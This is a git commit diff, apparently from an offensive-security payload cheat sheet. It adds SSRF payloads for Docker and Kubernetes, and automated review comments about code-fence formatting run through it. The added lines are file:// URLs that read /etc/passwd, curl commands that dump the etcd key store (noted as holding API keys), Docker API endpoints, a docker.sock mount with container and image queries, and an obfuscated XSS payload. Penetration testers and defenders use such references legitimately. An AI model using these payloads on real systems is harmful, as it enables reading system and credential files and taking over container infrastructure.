SSRF Docker & Kubernetes

patch-1
Swissky 2018-08-19 16:32:26 +02:00
parent e11339e669
commit cfbe1a4469
2 changed files with 29 additions and 0 deletions


@ -153,6 +153,13 @@ List:
## SSRF via URL Scheme
File Wrapper
```powershell
file:///etc/passwd
file://\/\/etc/passwd
```
Dict Wrapper
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
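Review bot: the new File Wrapper block is fenced as ```powershell, but `file:///etc/passwd` and `file://\/\/etc/passwd` are URL schemes, not PowerShell, so a plain ``` fence (or `text`) avoids misleading highlighting. A one-line remark on what the second, slash-escaped form is meant to demonstrate would also help, since the two lines are listed without explanation.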
@ -396,6 +403,27 @@ http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
```
### SSRF URL for Kubernetes ETCD
Can contain API keys and internal ip and ports
```powershell
curl -L http://127.0.0.1:2379/version
curl http://127.0.0.1:2379/v2/keys/?recursive=true
```
### SSRF URL for Docker
```powershell
http://127.0.0.1:2375/v1.24/containers/json
Simple example
docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
## Thanks to
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
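Review bot: in the "SSRF URL for Docker" block a single ```powershell fence mixes the target URL, the prose line "Simple example" and a shell session, so "Simple example" renders as code; put `http://127.0.0.1:2375/v1.24/containers/json` in its own fence, move "Simple example" out as text, and tag the `docker run` / `curl --unix-socket` session as `bash`. The `docker run -v /var/run/docker.sock:...` commands also exercise a mounted socket rather than the URL the heading describes, so one sentence saying this is a local reproduction of what the 2375 endpoint exposes would tie it to the section. In the etcd block the same `powershell` tag is used for curl commands, the fragment "Can contain API keys and internal ip and ports" should be a full sentence (e.g. "The key space can contain API keys and internal IPs and ports"), and it is worth stating that `/v2/keys/?recursive=true` is the etcd v2 keys API path.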


@ -682,6 +682,7 @@ Bypass using weird encoding or native interpretation to hide the payload (alert(
Exotic payloads
```javascript
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
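Review bot: the Exotic payloads block is fenced as ```javascript, but every line is HTML markup (`<svg/onload=...>`, `<img src=1 ...>`, `<script>...`), so `html` is the correct tag. Since this hunk adds one line to an existing list, the addition is not distinguishable in the rendered file; a short comment per payload on which encoding or parsing quirk it relies on (e.g. the template-literal concatenation in the `<svg>` line, the `top[alt+lang]` attribute lookup in the `<img>` line) would make the list more useful for readers writing detections.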